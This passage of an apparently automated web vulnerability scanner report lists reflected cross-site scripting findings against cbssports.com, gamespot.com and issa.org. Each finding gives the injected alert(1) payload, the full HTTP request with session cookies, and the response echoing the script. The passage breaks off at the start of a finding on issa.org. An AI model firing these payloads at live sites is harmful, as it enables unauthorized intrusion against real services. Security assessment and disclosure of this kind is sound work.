Set-Cookie: last_access=1303946388; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:48 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 104638

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com </title>

...[SNIP]...
cript type="text/javascript">
// Bind comments section; on page load, get the initial data and display:
$(document).ready( function (e) { CBSi.app.jqComments.init({
   sort:"newest",
   cid:"5661654ebe7";6e5ffa7528e",
   maxCount: 10,
   arena: "tennis",
   contentType: "p",

   // Note the author ones below cannot be cached, they must come from a data provider
   myAuthorID: "",
   isAdmin: "",
   canReportPost: "",
   canWarn:
...[SNIP]...

3.760. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b726"style%3d"x%3aexpression(alert(1))"1c9ce1d0a75 was submitted in the REST URL parameter 4. This input was echoed as 9b726"style="x:expression(alert(1))"1c9ce1d0a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players/playerpage/5661659b726"style%3d"x%3aexpression(alert(1))"1c9ce1d0a75/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:48 GMT
Server: Apache
Set-Cookie: last_access=1303946388; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:48 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 105616

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com </title>

...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players/playerpage/5661659b726"style="x:expression(alert(1))"1c9ce1d0a75/2011/victoria-azarenka">
...[SNIP]...

3.761. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5032b"style%3d"x%3aexpression(alert(1))"6e43533a5e1 was submitted in the REST URL parameter 5. This input was echoed as 5032b"style="x:expression(alert(1))"6e43533a5e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players/playerpage/566165/20115032b"style%3d"x%3aexpression(alert(1))"6e43533a5e1/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:53 GMT
Server: Apache
Set-Cookie: last_access=1303946393; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:53 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 116040

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Victoria Azarenka, WTA - Tennis -
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players/playerpage/566165/20115032b"style="x:expression(alert(1))"6e43533a5e1/victoria-azarenka">
...[SNIP]...

3.762. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ac"style%3d"x%3aexpression(alert(1))"115b9ba364a was submitted in the REST URL parameter 6. This input was echoed as 867ac"style="x:expression(alert(1))"115b9ba364a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players/playerpage/566165/2011/victoria-azarenka867ac"style%3d"x%3aexpression(alert(1))"115b9ba364a HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:56 GMT
Server: Apache
Set-Cookie: last_access=1303946396; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:56 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 116040

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Victoria Azarenka, WTA - Tennis -
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka867ac"style="x:expression(alert(1))"115b9ba364a">
...[SNIP]...

3.763. http://www.gamespot.com/crossdomain.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532ce"><script>alert(1)</script>84904d26d34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /crossdomain.xml532ce"><script>alert(1)</script>84904d26d34 HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://image.com.com/gamespot/images/cne_flash/production/slide_show/gs_wide_topslot/topslot_wide.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 23:38:38 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:38:38 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:38:38 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/crossdomain.xml532ce"><script>alert(1)</script>84904d26d34" />
...[SNIP]...

3.764. http://www.gamespot.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 268f9"><script>alert(1)</script>396989e24ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico268f9"><script>alert(1)</script>396989e24ac HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 23:40:33 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:40:34 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:40:34 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/favicon.ico268f9"><script>alert(1)</script>396989e24ac" />
...[SNIP]...

3.765. http://www.gamespot.com/games.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/games.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f7f"><script>alert(1)</script>37bf85096c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games.htmla2f7f"><script>alert(1)</script>37bf85096c9?type=top_rated&mode=top&page_type=games&om_act=convert&om_clk=subnav&tag=subnav%3Btop_games HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:48:08 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:48:08 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:48:08 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 74228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/games.htmla2f7f"><script>alert(1)</script>37bf85096c9?mode=top&page_type=games&type=top_rated" />
...[SNIP]...

3.766. http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/pages/hub/modules/topslot_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6635"><script>alert(1)</script>552a697fee2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesa6635"><script>alert(1)</script>552a697fee2/hub/modules/topslot_xml.php?topslot_platform=0 HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://image.com.com/gamespot/images/cne_flash/production/slide_show/gs_wide_topslot/topslot_wide.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 23:38:28 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:38:28 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:38:28 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/pagesa6635"><script>alert(1)</script>552a697fee2/hub/modules/topslot_xml.php?topslot_platform=0" />
...[SNIP]...

3.767. http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/pages/hub/modules/topslot_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b55f"><script>alert(1)</script>20ce4b94227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/hub2b55f"><script>alert(1)</script>20ce4b94227/modules/topslot_xml.php?topslot_platform=0 HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://image.com.com/gamespot/images/cne_flash/production/slide_show/gs_wide_topslot/topslot_wide.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 23:38:38 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:38:38 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:38:38 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/pages/hub2b55f"><script>alert(1)</script>20ce4b94227/modules/topslot_xml.php?topslot_platform=0" />
...[SNIP]...

3.768. http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/pages/hub/modules/topslot_xml.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 687d1"><script>alert(1)</script>a60b2b4bff1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/hub/modules687d1"><script>alert(1)</script>a60b2b4bff1/topslot_xml.php?topslot_platform=0 HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://image.com.com/gamespot/images/cne_flash/production/slide_show/gs_wide_topslot/topslot_wide.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 23:38:49 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:38:49 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:38:49 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/pages/hub/modules687d1"><script>alert(1)</script>a60b2b4bff1/topslot_xml.php?topslot_platform=0" />
...[SNIP]...

3.769. http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/pages/hub/modules/topslot_xml.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2666"><script>alert(1)</script>44cbddd1429 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/hub/modules/topslot_xml.phpe2666"><script>alert(1)</script>44cbddd1429?topslot_platform=0 HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://image.com.com/gamespot/images/cne_flash/production/slide_show/gs_wide_topslot/topslot_wide.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 23:38:59 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:38:59 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:38:59 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/pages/hub/modules/topslot_xml.phpe2666"><script>alert(1)</script>44cbddd1429?topslot_platform=0" />
...[SNIP]...

3.770. https://www.issa.org/Members/Log-In.php [issa_connect_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.issa.org
Path:	/Members/Log-In.php

Issue detail

